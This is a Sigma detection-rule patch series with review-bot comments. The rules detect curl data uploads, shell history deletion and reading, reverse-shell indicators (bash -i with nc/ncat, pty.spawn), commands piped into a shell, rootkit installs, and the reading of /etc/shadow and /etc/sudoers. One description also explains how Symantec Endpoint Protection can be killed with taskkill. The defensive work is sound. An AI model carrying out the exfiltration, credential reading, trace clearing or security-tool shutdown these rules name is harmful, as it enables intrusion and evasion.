+id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
+related:
+ - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
+ type: derived
+status: experimental
+description: Detects a suspicious curl process start the adds a file to a web request
+author: Nasreddine Bencherchali
+references:
+ - https://twitter.com/d1r4c/status/1279042657508081664
+ - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
+ - https://curl.se/docs/manpage.html
+ - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+date: 2022/09/15
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/curl.exe'
+ CommandLine|contains:
+ - ' -F '
+ - ' --form '
+ - ' --form-string '
+ - ' -T '
+ - ' --upload-file '
+ - ' -d '
+ - ' --data '
+ - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
+ condition: selection
+falsepositives:
+ - Scripts created by developers and admins
+level: medium
+tags:
+ - attack.exfiltration
+ - attack.t1567
+ - attack.t1105
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
new file mode 100644
index 000000000..f38914616
--- /dev/null
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
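Review bot: The description has a grammatical slip, `description: Detects a suspicious curl process start the adds a file to a web request` should read `description: Detects a suspicious curl process start that adds a file to a web request`. Since `' -d '`/`' --data '` also cover ordinary form POSTs with no file involved, the description could say "adds data or a file" to match what the selection actually catches.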
@@ -0,0 +1,28 @@
+title: Suspicious Curl Change User Agents - Linux
+id: b86d356d-6093-443d-971c-9b07db583c68
+related:
+ - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
+ type: derived
+status: experimental
+description: Detects a suspicious curl process start on linux with set useragent options
+author: Nasreddine Bencherchali
+references:
+ - https://curl.se/docs/manpage.html
+date: 2022/09/15
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/curl'
+ CommandLine|contains:
+ - ' -A '
+ - ' --user-agent '
+ condition: selection
+falsepositives:
+ - Scripts created by developers and admins
+ - Administrative activity
+level: medium
+tags:
+ - attack.command_and_control
+ - attack.t1071.001
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
index 3727dee7e..1e893bf23 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
@@ -4,23 +4,30 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..ffddb3b60 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml 
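Review bot: The tags re-added on the new side, `- attack.impact` / `- attack.t1565.001` (Stored Data Manipulation), do not describe deleting a shell history file, and the reference this hunk adds is the T1552.003 atomic, which points the other way too; the behaviour the description states is T1070.003 Clear Command History, so `- attack.defense_evasion` / `- attack.t1070.003` fit. The history_recon hunk that follows has the same mismatch: `attack.t1592.004` is a pre-compromise reconnaissance technique, while reading history files on a host is T1552.003 Unsecured Credentials: Bash History under `attack.credential_access`. Both hunks cover the whole `tags` list, so the change is self-contained.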
@@ -4,23 +4,31 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml 
@@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth 
@@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 
--- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml 
@@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml 
@@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 From 7a5017696fddafaa68eed8cc07b09e6e2fb90a69 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:23:15 +0200 Subject: [PATCH 033/120] Add more flag to curl windows rule --- .../proc_creation_win_susp_curl_fileupload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 20ffcba7a..44c6f4373 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -9,7 +9,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html date: 2020/07/03 -modified: 2022/01/22 +modified: 2022/09/15 logsource: category: process_creation product: windows 
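Review bot: The new file is named `prox_creation_lnx_chattr_immutable_removal.yml`, while every other rule in this directory, including the ones added by the same commit, uses the `proc_creation_lnx_` prefix; it should be renamed to `proc_creation_lnx_chattr_immutable_removal.yml` so directory-based tooling and naming checks pick it up. Note also that `CommandLine|contains: ' -i '` requires a trailing space, so the flag is only matched when it is followed by another argument; that is fine for the usual `chattr -i <file>` form but worth stating in a comment.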
@@ -21,10 +21,12 @@ detection: CommandLine|contains: - ' -F ' - ' --form ' + - ' --form-string ' - ' -T ' - ' --upload-file ' - ' -d ' - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" condition: all of selection* fields: - CommandLine From 33271e9034c648f98f3dd1313c2fc9d0f07effdf Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:29:45 +0200 Subject: [PATCH 034/120] Quick update --- .../proc_creation_lnx_susp_history_delete.yml | 1 + .../proc_creation_macos_clear_system_logs.yml | 7 +++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 1e893bf23..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -16,6 +16,7 @@ detection: Image|endswith: - '/rm' - '/unlink' + - '/shred' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml index 7c10bd097..3962cf127 100644 --- a/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml +++ b/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: 
@@ -12,7 +12,10 @@ logsource: category: process_creation detection: selection1: - Image|endswith: '/rm' + Image|endswith: + - '/rm' + - '/unlink' + - '/shred' selection_cli_1: CommandLine|contains: '/var/log' selection_cli_2: From 5dfa871cefa52c8e74b5b9acca99d9e117ce05c9 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:38:00 +0200 Subject: [PATCH 035/120] Update proc_creation_lnx_base64_shebang_cli.yml --- .../process_creation/proc_creation_lnx_base64_shebang_cli.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml index 73ac17665..a58e96eb9 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -12,7 +12,7 @@ logsource: category: process_creation detection: selection: - - CommandLine|contains: + CommandLine|contains: - "IyEvYmluL2Jhc2" #!/bin/bash" - "IyEvYmluL2Rhc2" #!/bin/dash" - "IyEvYmluL3pza" #!/bin/zsh" From c2256845b2e67837b4f71d2cc47a4efc256fca34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:45:56 +0200 Subject: [PATCH 036/120] refactor: renamed and changed title --- ...ation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_disable_SEP.yml => proc_creation_win_taskkill_sep.yml} (95%) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml similarity index 95% rename from rules/windows/process_creation/proc_creation_disable_SEP.yml rename to rules/windows/process_creation/proc_creation_win_taskkill_sep.yml index abe183491..92f6ddbbe 100644 
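Review bot: `- '/shred'` in selection1 is, to my knowledge, not part of the default macOS userland (the BSD tools ship no shred, and Homebrew coreutils installs it as `gshred` unless the unprefixed names are put on PATH), so on a stock system this entry never matches. Keeping it is harmless, but a comment such as `# GNU coreutils, only present when installed via a package manager` would explain why a non-native binary is listed in a macOS rule. The proc_creation_lnx_susp_history_delete.yml hunk in the same commit is unaffected.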
--- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,4 +1,4 @@ -title: Disabling Symantec Endpoint Protection with Taskkill +title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. From 7f3158d09e24d7b3edd9332e5ef81d253de0c7c2 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 11:47:19 +0200 Subject: [PATCH 037/120] Fix after review --- .../linux/process_creation/proc_creation_lnx_cat_sudoers.yml | 1 + .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +- .../process_creation/proc_creation_lnx_local_account.yml | 1 + .../process_creation/proc_creation_lnx_local_groups.yml | 1 + .../proc_creation_lnx_susp_curl_fileupload.yml | 5 ++--- .../proc_creation_lnx_susp_history_recon.yml | 1 + .../proc_creation_win_susp_curl_fileupload.yml | 3 +-- 7 files changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 5f7b9d5e7..2f7690be4 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -17,6 +17,7 @@ detection: - 'grep' - '/head' - '/tail' + - '/more' CommandLine|contains: ' /etc/sudoers' condition: selection falsepositives: 
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml index 730ba33df..580eece01 100644 --- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -11,7 +11,7 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' condition: selection falsepositives: - Scripts created by developers and admins diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index 058e10b0e..fee4138fe 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -20,6 +20,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: - '/etc/passwd' - '/etc/shadow' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index ba0b9cad7..1bf72b8ea 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -18,6 +18,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml index a38c1ef16..c47d62511 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml 
@@ -18,11 +18,10 @@ logsource: product: linux detection: selection: - Image|endswith: '/curl.exe' + Image|endswith: '/curl' CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index ffddb3b60..128644fd6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -17,6 +17,7 @@ detection: - '/cat' - '/head' - '/tail' + - '/more' selection_history: - CommandLine|contains: - '/.bash_history' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 44c6f4373..f8ae829c9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -20,8 +20,7 @@ detection: selection_cli: CommandLine|contains: - ' -F ' - - ' --form ' - - ' --form-string ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' From 9d5652c4c2d406440837fb6e0cd98cf76c4879ff Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:43:01 +0200 Subject: [PATCH 038/120] Update proc_creation_lnx_services_stop_and_disable.yml --- .../proc_creation_lnx_services_stop_and_disable.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml index 130d9b5c8..7b1778780 100644 --- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml 
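Review bot: Both curl rules now fold `' --form '` and `' --form-string '` into the bare prefix `' --form'`, but the `' --data '`/`' --data-'` pair added to the Windows rule in patch 033 (outside this hunk) is left as two entries; `' --data'` would follow the same rule, and if the Linux rule carries the same pair it applies there too. The inline comment is a fragment and reads better as `# Also covers "--form-string"`. The same change and comment appear in the proc_creation_win_susp_curl_fileupload.yml hunk further down, which this note covers as well.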
+++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -1,4 +1,4 @@ -title: Disable Or Stop Servicess +title: Disable Or Stop Services id: de25eeb8-3655-4643-ac3a-b662d3f26b6b status: experimental description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services From 914aa4ee3153185b400e72d0107ce2c5ffbd307c Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:58:52 +0200 Subject: [PATCH 039/120] chore: add more checks --- tests/check-baseline-local.sh | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 4c3929b90..3c849f52d 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then exit 1 fi +if [[ -z $(command -v xargs) ]]; then + >2& echo "xargs not found. Please install findutils." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v tar) ]]; then + >2& echo "tar not found. Please install." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v mktemp) ]]; then + >2& echo "mktemp not found. Please install coreutils." + >2& echo "Exiting" + exit 1 +fi + if [[ -z $(command -v realpath) ]]; then >2& echo "realpath not found. Please install coreutils." >2& echo "Exiting" From 68a80844ea911f6ddd0ba0f77fc964f6713bdda9 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 15 Sep 2022 13:14:37 +0200 Subject: [PATCH 040/120] fix: new FPs in testing environment --- .../image_load/image_load_susp_dbghelp_dbgcore_load.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml index c3d02ecdd..36d307d82 100755 
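Review bot: The six added `>2& echo …` lines do not write to stderr: `>2` redirects stdout to a file literally named `2`, the trailing `&` backgrounds that empty command, and the echo itself runs in the foreground printing to stdout, so every failed check leaves a stray file `2` in the working directory. The intended redirection is `>&2`, e.g. `>&2 echo "xargs not found. Please install findutils."`, on each of the new lines. The pre-existing realpath check that follows in the hunk uses the same pattern (and presumably the wget check above it), so the fix belongs to the whole file rather than to these three blocks alone.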
--- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows @@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' From bde13350059aefd5833f151b0eda82924b6e2190 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:53:42 +0200 Subject: [PATCH 041/120] fix: FP with .NET ngen on test system --- .../registry_set/registry_set_taskcache_entry.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ 
@@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' From bbc4aa329839f008cc63b1367b65203fa931824d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 16 Sep 2022 10:08:08 +0200 Subject: [PATCH 042/120] improve detection rate --- ..._creation_win_cobaltstrike_load_by_rundll32.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml @@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 